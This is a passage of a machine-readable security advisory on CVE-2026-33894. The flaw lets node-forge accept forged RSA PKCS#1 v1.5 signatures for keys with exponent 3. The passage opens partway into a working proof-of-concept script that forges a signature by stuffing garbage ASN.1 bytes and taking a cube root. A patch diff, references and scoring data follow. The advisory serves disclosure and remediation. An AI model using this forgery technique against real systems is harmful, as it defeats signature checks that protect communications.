+ derLen(garbageLen).length + garbageLen;\n const prefix = Buffer.concat([\n Buffer.from([0x00, 0x01]),\n Buffer.alloc(ffCount, 0xff),\n Buffer.from([0x00]),\n Buffer.from([0x30]), derLen(seqLen),\n algAndDigest,\n Buffer.from([0x04]), derLen(garbageLen)\n ]);\n\n // Build the numeric interval of all EM values that start with `prefix`:\n // - `low` = prefix || 00..00\n // - `high` = one past (prefix || ff..ff)\n // Then find `s` such that s^3 is inside [low, high), so EM has our prefix.\n const suffixLen = k - prefix.length;\n const low = toBig(Buffer.concat([prefix, Buffer.alloc(suffixLen)]));\n const high = low + (1n << BigInt(8 * suffixLen));\n const s = cbrtCeil(low);\n if (s > cbrtFloor(high - 1n) || s >= n) throw new Error('no candidate in interval');\n\n const sig = toBuf(s, k);\n\n const controlMsg = Buffer.from('control-message', 'utf8');\n const controlSig = crypto.sign('sha256', controlMsg, {\n key: privateKey,\n padding: crypto.constants.RSA_PKCS1_PADDING\n });\n\n // forge verification calls (library under test)\n const controlForge = forgeStrictVerify(publicKey, controlMsg, controlSig);\n const forgedForge = forgeStrictVerify(publicKey, msg, sig);\n\n // Node.js verification calls (OpenSSL-backed reference behavior)\n const controlNode = crypto.verify('sha256', controlMsg, {\n key: publicKey,\n padding: crypto.constants.RSA_PKCS1_PADDING\n }, controlSig);\n const forgedNode = crypto.verify('sha256', msg, {\n key: publicKey,\n padding: crypto.constants.RSA_PKCS1_PADDING\n }, sig);\n\n console.log('control-forge-strict:', controlForge.ok, controlForge.err || '');\n console.log('control-node:', controlNode);\n console.log('forgery (forge library, strict):', forgedForge.ok, forgedForge.err || '');\n console.log('forgery (node/OpenSSL):', forgedNode);\n}\n\nmain();\n```\n
\n\n## Suggested Patch\n- Enforce PKCS#1 v1.5 BT=0x01 minimum padding length (`PS >= 8`) in `_decodePkcs1_v1_5` before accepting the block.\n- Update the RSASSA-PKCS1-v1_5 verifier to require canonical DigestInfo structure only (no extra attacker-controlled ASN.1 content beyond expected fields).\n\nHere is a Forge-tested patch to resolve the issue, though it should be verified for consumer projects:\n\n```diff\nindex b207a63..ec8a9c1 100644\n--- a/lib/rsa.js\n+++ b/lib/rsa.js\n@@ -1171,6 +1171,14 @@ pki.setRsaPublicKey = pki.rsa.setPublicKey = function(n, e) {\n error.errors = errors;\n throw error;\n }\n+\n+ if(obj.value.length != 2) {\n+ var error = new Error(\n+ 'DigestInfo ASN.1 object must contain exactly 2 fields for ' +\n+ 'a valid RSASSA-PKCS1-v1_5 package.');\n+ error.errors = errors;\n+ throw error;\n+ }\n // check hash algorithm identifier\n // see PKCS1-v1-5DigestAlgorithms in RFC 8017\n // FIXME: add support to validator for strict value choices\n@@ -1673,6 +1681,10 @@ function _decodePkcs1_v1_5(em, key, pub, ml) {\n }\n ++padNum;\n }\n+\n+ if (padNum < 8) {\n+ throw new Error('Encryption block is invalid.');\n+ }\n } else if(bt === 0x02) {\n // look for 0x00 byte\n padNum = 0;\n```\n## Resources\n- RFC 2313 (PKCS v1.5): https://datatracker.ietf.org/doc/html/rfc2313#section-8\n - > This limitation guarantees that the length of the padding string PS is at least eight octets, which is a security condition. \n- RFC 8017: https://www.rfc-editor.org/rfc/rfc8017.html\n- `lib/rsa.js` `key.verify(...)` at lines ~1139-1223.\n- `lib/rsa.js` `_decodePkcs1_v1_5(...)` at lines ~1632-1695.\n\n## Credit\n\nThis vulnerability was discovered as part of a U.C. Berkeley security research project by: Austin Chu, Sohee Kim, and Corban Villa.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-ppp5-5v6c-4jwp.json?alt=media" }, { "category": "description", "text": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing “garbage” bytes within the ASN structure in order to construct a signature that passes verification, enabling Bleichenbacher style forgery. This issue is similar to CVE-2022-24771, but adds bytes in an addition field within the ASN structure, rather than outside of it. Additionally, forge does not validate that signatures include a minimum of 8 bytes of padding as defined by the specification, providing attackers additional space to construct Bleichenbacher forgeries. Version 1.4.0 patches the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33894" }, { "category": "description", "text": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing “garbage” bytes within the ASN structure in order to construct a signature that passes verification, enabling Bleichenbacher style forgery. This issue is similar to CVE-2022-24771, but adds bytes in an addition field within the ASN structure, rather than outside of it. Additionally, forge does not validate that signatures include a minimum of 8 bytes of padding as defined by the specification, providing attackers additional space to construct Bleichenbacher forgeries. Version 1.4.0 patches the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33894.json" }, { "category": "description", "text": "A flaw was found in Forge (also called `node-forge`), a JavaScript implementation of Transport Layer Security. A remote attacker could exploit weaknesses in the RSASSA PKCS#1 v1.5 signature verification process. By crafting malicious signatures that include extra data within the ASN structure and do not meet padding requirements, an attacker can bypass signature validation. This allows for the creation of forged signatures that appear legitimate, potentially compromising the integrity and authenticity of communications.", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33894.json" }, { "category": "other", "text": "0.00029", "title": "EPSS" }, { "category": "other", "text": "4.0", "title": "NCSC Score" }, { "category": "other", "text": "There is product_remediation data available from source Redhat", "title": "NCSC Score top decreasing factors" }, { "category": "details", "text": "Severity: 3\n", "title": "Vendor assessment" } ], "product_status": { "known_affected": [ "CSAFPID-5920253", "CSAFPID-5956281", "CSAFPID-1439292", "CSAFPID-1439294", "CSAFPID-1439306", "CSAFPID-1439317", "CSAFPID-1439319", "CSAFPID-1441200", "CSAFPID-1455906", "CSAFPID-1459353", "CSAFPID-1459355", "CSAFPID-1496261", "CSAFPID-1508257", "CSAFPID-1771999", "CSAFPID-1837472", "CSAFPID-1837473", "CSAFPID-2109952", "CSAFPID-2109953", "CSAFPID-2467441", "CSAFPID-2467442", "CSAFPID-2467443", "CSAFPID-2467444", "CSAFPID-2467445", "CSAFPID-2467448", "CSAFPID-2552001", "CSAFPID-2698055", "CSAFPID-2698057", "CSAFPID-2855724", "CSAFPID-2855725", "CSAFPID-2858634", "CSAFPID-2868420", "CSAFPID-2914696", "CSAFPID-2914697", "CSAFPID-5187689", "CSAFPID-5222698", "CSAFPID-5940623", "CSAFPID-5940626", "CSAFPID-5940629" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-ppp5-5v6c-4jwp" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-ppp5-5v6c-4jwp.json?alt=media" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33894" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33894.json" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33894.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-cfm4-qjh2-4765" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://datatracker.ietf.org/doc/html/rfc2313#section-8" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://www.rfc-editor.org/rfc/rfc8017.html" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-ppp5-5v6c-4jwp" }, { "category": "external", "summary": "Reference - github; redhat", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894" }, { "category": "external", "summary": "Reference - redhat", "url": "https://www.cve.org/CVERecord?id=CVE-2026-33894" } ], "remediations": [ { "category": "mitigation", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "CSAFPID-1439292", "CSAFPID-1439294", "CSAFPID-1439306", "CSAFPID-1439317", "CSAFPID-1439319", "CSAFPID-1441200", "CSAFPID-1455906", "CSAFPID-1459353", "CSAFPID-1459355", "CSAFPID-1496261", "CSAFPID-1508257", "CSAFPID-1771999", "CSAFPID-1837472", "CSAFPID-1837473", "CSAFPID-2109952", "CSAFPID-2109953", "CSAFPID-2467441", "CSAFPID-2467442", "CSAFPID-2467443", "CSAFPID-2467444", "CSAFPID-2467445", "CSAFPID-2467448", "CSAFPID-2552001", "CSAFPID-2698055", "CSAFPID-2698057", "CSAFPID-2855724", "CSAFPID-2855725", "CSAFPID-2858634", "CSAFPID-2868420", "CSAFPID-2914696", "CSAFPID-2914697", "CSAFPID-5187689", "CSAFPID-5222698", "CSAFPID-5940623", "CSAFPID-5940626", "CSAFPID-5940629" ] } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-1439292", "CSAFPID-1439294", "CSAFPID-1439306", "CSAFPID-1439317", "CSAFPID-1439319", "CSAFPID-1441200", "CSAFPID-1455906", "CSAFPID-1459353", "CSAFPID-1459355", "CSAFPID-1496261", "CSAFPID-1508257", "CSAFPID-1771999", "CSAFPID-1837472", "CSAFPID-1837473", "CSAFPID-2109952", "CSAFPID-2109953", "CSAFPID-2467441", "CSAFPID-2467442", "CSAFPID-2467443", "CSAFPID-2467444", "CSAFPID-2467445", "CSAFPID-2467448", "CSAFPID-2552001", "CSAFPID-2698055", "CSAFPID-2698057", "CSAFPID-2855724", "CSAFPID-2855725", "CSAFPID-2858634", "CSAFPID-2868420", "CSAFPID-2914696", "CSAFPID-2914697", "CSAFPID-5187689", "CSAFPID-5222698", "CSAFPID-5920253", "CSAFPID-5940623", "CSAFPID-5940626", "CSAFPID-5940629", "CSAFPID-5956281" ] } ], "title": "CVE-2026-33894" } ] }